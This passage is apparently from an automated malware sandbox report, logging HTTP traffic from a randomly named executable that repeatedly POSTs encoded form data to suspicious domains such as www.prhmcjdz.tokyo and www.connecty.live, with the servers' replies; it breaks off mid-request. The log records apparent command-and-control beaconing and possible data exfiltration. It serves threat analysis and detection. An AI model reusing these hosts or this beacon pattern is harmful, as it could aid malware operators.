                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Jan 11, 2025 08:17:48.016223907 CET1033INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Sat, 11 Jan 2025 07:17:47 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.7499908.218.14.120806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:53.745992899 CET741OUTPOST /cm9a/ HTTP/1.1
                                                                    Host: www.prhmcjdz.tokyo
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.prhmcjdz.tokyo
                                                                    Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 4e 74 6c 59 31 31 75 38 77 77 38 79 76 31 5a 6b 39 41 79 4f 45 5a 46 4d 4a 4e 4b 66 61 4a 68 36 33 36 44 49 6f 72 4e 69 2f 59 6f 35 54 4e 53 39 68 64 74 73 47 50 76 4d 6a 78 7a 41 2f 55 33 51 67 78 33 67 59 49 4e 73 56 4a 56 70 54 42 57 37 64 5a 32 32 6b 52 54 63 75 50 79 6e 63 6d 6a 55 65 57 65 2b 4e 2b 6f 70 49 44 64 61 41 32 6e 69 30 2f 6c 62 7a 63 6e 6e 76 53 72 39 41 57 79 6c 4a 6f 70 4b 64 62 43 45 57 4f 41 71 68 6b 5a 55 74 48 66 4b 7a 58 64 62 63 62 2f 34 52 4d 42 36 6f 6d 74 32 65 44 55 72 37 68 6c 37 78 43 45 37 76 75 73 31 53 7a 76 44 2f 2b 76 6d 66 43 2b 4f 73 73 66 79 61 6b 7a 7a 39 5a 42 67 55 6b 74 43 54 41 3d 3d
                                                                    Data Ascii: QbUPL=NtlY11u8ww8yv1Zk9AyOEZFMJNKfaJh636DIorNi/Yo5TNS9hdtsGPvMjxzA/U3Qgx3gYINsVJVpTBW7dZ22kRTcuPyncmjUeWe+N+opIDdaA2ni0/lbzcnnvSr9AWylJopKdbCEWOAqhkZUtHfKzXdbcb/4RMB6omt2eDUr7hl7xCE7vus1SzvD/+vmfC+Ossfyakzz9ZBgUktCTA==
                                                                    Jan 11, 2025 08:17:54.627358913 CET508INHTTP/1.1 200
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:54 GMT
                                                                    Content-Type: application/json;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Origin
                                                                    Vary: Access-Control-Request-Method
                                                                    Vary: Access-Control-Request-Headers
                                                                    Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                    Access-Control-Allow-Credentials: true
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.7499918.218.14.120806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:56.477174997 CET761OUTPOST /cm9a/ HTTP/1.1
                                                                    Host: www.prhmcjdz.tokyo
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.prhmcjdz.tokyo
                                                                    Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 4e 74 6c 59 31 31 75 38 77 77 38 79 76 56 70 6b 75 33 6d 4f 55 4a 46 44 4b 4e 4b 66 44 5a 68 2b 33 36 48 49 6f 70 67 6e 2f 4c 63 35 53 6f 75 39 69 5a 35 73 54 50 76 4d 37 68 7a 46 37 55 33 66 67 78 36 54 59 49 68 73 56 49 78 70 54 42 47 37 64 4f 69 33 2b 68 54 65 37 2f 79 35 53 47 6a 55 65 57 65 2b 4e 2b 74 79 49 44 46 61 41 46 2f 69 31 62 35 61 2f 38 6e 6b 2b 53 72 39 45 57 7a 73 4a 6f 70 6f 64 61 75 71 57 4e 34 71 68 6b 70 55 73 53 72 46 6d 6e 64 5a 53 37 2f 6d 61 4d 6b 42 67 48 4d 52 5a 31 4d 52 6a 68 39 36 35 55 46 5a 31 4d 67 5a 4d 69 58 34 37 38 4c 51 49 6b 6a 37 75 74 62 71 58 47 48 53 69 75 6b 4b 5a 32 4d 47 46 36 63 52 65 35 38 61 51 43 56 2f 75 2b 65 70 45 6f 38 6b 6a 69 77 3d
                                                                    Data Ascii: QbUPL=NtlY11u8ww8yvVpku3mOUJFDKNKfDZh+36HIopgn/Lc5Sou9iZ5sTPvM7hzF7U3fgx6TYIhsVIxpTBG7dOi3+hTe7/y5SGjUeWe+N+tyIDFaAF/i1b5a/8nk+Sr9EWzsJopodauqWN4qhkpUsSrFmndZS7/maMkBgHMRZ1MRjh965UFZ1MgZMiX478LQIkj7utbqXGHSiukKZ2MGF6cRe58aQCV/u+epEo8kjiw=
                                                                    Jan 11, 2025 08:17:57.228091002 CET508INHTTP/1.1 200
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:57 GMT
                                                                    Content-Type: application/json;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Origin
                                                                    Vary: Access-Control-Request-Method
                                                                    Vary: Access-Control-Request-Headers
                                                                    Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                    Access-Control-Allow-Credentials: true
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.7499928.218.14.120806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:59.051192999 CET1774OUTPOST /cm9a/ HTTP/1.1
                                                                    Host: www.prhmcjdz.tokyo
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.prhmcjdz.tokyo
                                                                    Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 4e 74 6c 59 31 31 75 38 77 77 38 79 76 56 70 6b 75 33 6d 4f 55 4a 46 44 4b 4e 4b 66 44 5a 68 2b 33 36 48 49 6f 70 67 6e 2f 4b 6b 35 53 61 57 39 6b 4c 52 73 42 2f 76 4d 6c 78 7a 45 37 55 33 34 67 78 69 66 59 49 38 4f 56 4c 5a 70 54 69 2b 37 4d 76 69 33 72 78 54 65 6b 76 79 6b 63 6d 6a 42 65 56 6d 36 4e 2b 39 79 49 44 46 61 41 45 50 69 7a 50 6c 61 39 38 6e 6e 76 53 72 68 41 57 7a 41 4a 6f 42 53 64 61 61 55 57 63 59 71 68 45 35 55 75 67 7a 46 36 33 64 58 48 37 2b 31 61 4d 59 65 67 47 68 2f 5a 31 52 32 6a 6d 52 36 6f 53 51 69 70 5a 41 55 50 79 62 77 38 64 50 54 4c 32 37 35 33 4f 65 63 64 6c 54 52 6d 38 77 30 53 57 67 76 4e 2b 5a 53 4a 6f 67 48 63 68 63 7a 6e 62 6e 61 66 36 6b 51 2b 79 45 2b 32 4a 31 49 49 72 56 58 53 6d 6a 54 4e 38 31 57 4c 65 33 4f 46 55 55 57 53 6d 39 76 79 62 6b 66 61 57 34 62 30 35 6d 71 75 67 50 70 4a 72 67 49 42 4d 75 43 51 4a 71 6d 55 48 69 63 66 59 66 61 6e 35 62 4c 30 65 46 54 64 42 57 4f 4d 36 59 53 75 5a 6b 37 54 53 78 58 4a 71 58 59 57 6a 50 32 6a 77 4a 6a [TRUNCATED]
                                                                    Data Ascii: QbUPL=NtlY11u8ww8yvVpku3mOUJFDKNKfDZh+36HIopgn/Kk5SaW9kLRsB/vMlxzE7U34gxifYI8OVLZpTi+7Mvi3rxTekvykcmjBeVm6N+9yIDFaAEPizPla98nnvSrhAWzAJoBSdaaUWcYqhE5UugzF63dXH7+1aMYegGh/Z1R2jmR6oSQipZAUPybw8dPTL2753OecdlTRm8w0SWgvN+ZSJogHchcznbnaf6kQ+yE+2J1IIrVXSmjTN81WLe3OFUUWSm9vybkfaW4b05mqugPpJrgIBMuCQJqmUHicfYfan5bL0eFTdBWOM6YSuZk7TSxXJqXYWjP2jwJjReaFxUl4i4rqcvNAhgYekuvxWlxxxOUErXTlSdifpH6zgetNv0qKCK6WKPC61ys3E9p8af92pThAHJ/9nVVs6s1ivxv4eYeL2iyOkhJ8TbLC87bgdqIgr6uoT0QKe4iOMv13CkT9CoRIsfYWqU3J/z8L+7WW6ccT+QICPhHZHFRXBp6AvzyuBO+Ym8OODgmiTIr1M2GZlcDqwDzhff0jdQxygtYSysnEcDUXxmxwVBT6erDKxs3KLCOYwKTEOEQyD2ln9Y5Bqt/qjn14lQnf7tsvsQ4Zt38fAOJ4SKNJ281leqJxOgTXSB4TYLvWWyx1aeY9V4JhXqxRN8UlCguPDKqK8zpQQvK0mVEfIJi9thyhdD4bezrsTiTLBsooNLbIpX8UtkkEYSU0UppkVJIXzS4SMoTqtzS6i2IuJkrOgOBxS8MVHQB3AE/2qtGRb9z7XnoUsXmgiGGIdOtHNqNijB8jo4Zr4uDgpy5xrOGAUBi2+Bxs3A26/WTt9hew664VHHZgRO/KjZact7VhUmzydhvTRA1O7p9HHOjQeHyZbmaQbjOypmUpkbKujKqkXW0d1WRotJu4rGoiwFv0TLqgSOUmPhj7XPCg6qdtIMqUzHrTZghF1H3GAI8unQ1Dn7WXryKpnfJ4VAXKhwxClaTnTmb8kXzbX87JTG [TRUNCATED]
                                                                    Jan 11, 2025 08:17:59.919323921 CET508INHTTP/1.1 200
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:59 GMT
                                                                    Content-Type: application/json;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Origin
                                                                    Vary: Access-Control-Request-Method
                                                                    Vary: Access-Control-Request-Headers
                                                                    Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                    Access-Control-Allow-Credentials: true
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.7499938.218.14.120806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:01.593446970 CET482OUTGET /cm9a/?ef4=TJYXELnhFJhl&QbUPL=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvrBPGjvGvWTn9eE6YM8B8FSoiTH7Br/Ez7MnCgATlHy+hFK5SJ9epG9Mk HTTP/1.1
                                                                    Host: www.prhmcjdz.tokyo
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Jan 11, 2025 08:18:02.476223946 CET427INHTTP/1.1 200
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:18:02 GMT
                                                                    Content-Type: application/json;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Origin
                                                                    Vary: Access-Control-Request-Method
                                                                    Vary: Access-Control-Request-Headers
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-Cache: MISS
                                                                    Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.749994203.161.43.228806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:07.520422935 CET738OUTPOST /6urf/ HTTP/1.1
                                                                    Host: www.connecty.live
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.connecty.live
                                                                    Referer: http://www.connecty.live/6urf/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 47 2b 70 70 4d 39 34 72 31 6e 45 71 72 42 63 55 78 79 66 36 2b 6c 41 68 35 71 37 37 56 42 35 37 56 51 6c 49 43 6e 4a 54 63 71 52 32 39 68 56 55 30 51 6c 4f 51 64 52 4e 30 44 54 79 49 79 55 48 45 54 77 52 76 64 6a 64 31 76 49 48 39 54 52 52 64 35 34 32 69 6e 36 4b 4a 36 4b 54 61 66 31 63 76 37 58 31 49 2f 65 49 67 75 4f 33 6e 70 79 37 33 59 78 78 30 34 53 41 6d 52 36 46 50 45 4b 76 4e 4d 44 41 46 46 45 4f 70 68 4b 6b 6a 6e 38 33 76 35 79 6e 65 41 43 62 6d 58 68 4c 68 68 6c 53 47 4e 59 6f 34 43 6b 77 36 58 61 67 65 5a 34 6a 6a 53 4c 6f 53 75 46 35 71 30 39 49 73 76 6d 59 6c 65 31 36 50 51 3d 3d
                                                                    Data Ascii: QbUPL=o8IUFI7bomKMG+ppM94r1nEqrBcUxyf6+lAh5q77VB57VQlICnJTcqR29hVU0QlOQdRN0DTyIyUHETwRvdjd1vIH9TRRd542in6KJ6KTaf1cv7X1I/eIguO3npy73Yxx04SAmR6FPEKvNMDAFFEOphKkjn83v5yneACbmXhLhhlSGNYo4Ckw6XageZ4jjSLoSuF5q09IsvmYle16PQ==
                                                                    Jan 11, 2025 08:18:08.097700119 CET658INHTTP/1.1 404 Not Found
                                                                    Date: Sat, 11 Jan 2025 07:18:08 GMT
                                                                    Server: Apache
                                                                    Content-Length: 514
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.749995203.161.43.228806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:10.068294048 CET758OUTPOST /6urf/ HTTP/1.1
                                                                    Host: www.connecty.live
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.connecty.live
                                                                    Referer: http://www.connecty.live/6urf/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 48 64 78 70 4b 65 51 72 6b 58 45 74 68 68 63 55 2f 53 66 2b 2b 6c 45 68 35 76 4c 72 56 55 70 37 57 78 56 49 44 69 31 54 66 71 52 32 32 42 56 52 36 77 6c 56 51 64 63 36 30 42 48 79 49 79 77 48 45 57 4d 52 73 75 62 53 36 66 49 46 32 7a 52 70 44 4a 34 32 69 6e 36 4b 4a 36 65 31 61 66 64 63 73 4c 6e 31 4a 62 4b 50 6a 75 4f 32 67 70 79 37 7a 59 78 31 30 34 54 6c 6d 51 6d 72 50 42 47 76 4e 4d 54 41 45 55 45 52 38 78 4c 4f 74 48 39 42 75 62 48 73 48 6b 47 47 68 68 31 44 75 52 68 70 4b 62 5a 4b 69 67 6f 63 6b 47 69 62 61 62 63 56 30 30 57 64 51 76 42 68 6e 57 4a 70 7a 59 44 79 6f 4d 55 2b 5a 75 79 61 77 32 51 62 5a 77 65 38 4f 66 7a 4e 62 4b 69 78 4d 32 49 3d
                                                                    Data Ascii: QbUPL=o8IUFI7bomKMHdxpKeQrkXEthhcU/Sf++lEh5vLrVUp7WxVIDi1TfqR22BVR6wlVQdc60BHyIywHEWMRsubS6fIF2zRpDJ42in6KJ6e1afdcsLn1JbKPjuO2gpy7zYx104TlmQmrPBGvNMTAEUER8xLOtH9BubHsHkGGhh1DuRhpKbZKigockGibabcV00WdQvBhnWJpzYDyoMU+Zuyaw2QbZwe8OfzNbKixM2I=
                                                                    Jan 11, 2025 08:18:10.669715881 CET658INHTTP/1.1 404 Not Found
                                                                    Date: Sat, 11 Jan 2025 07:18:10 GMT
                                                                    Server: Apache
                                                                    Content-Length: 514
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.749996203.161.43.228806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:12.615262985 CET1771OUTPOST /6urf/ HTTP/1.1
                                                                    Host: www.connecty.live
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.connecty.live
                                                                    Referer: http://www.connecty.live/6urf/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
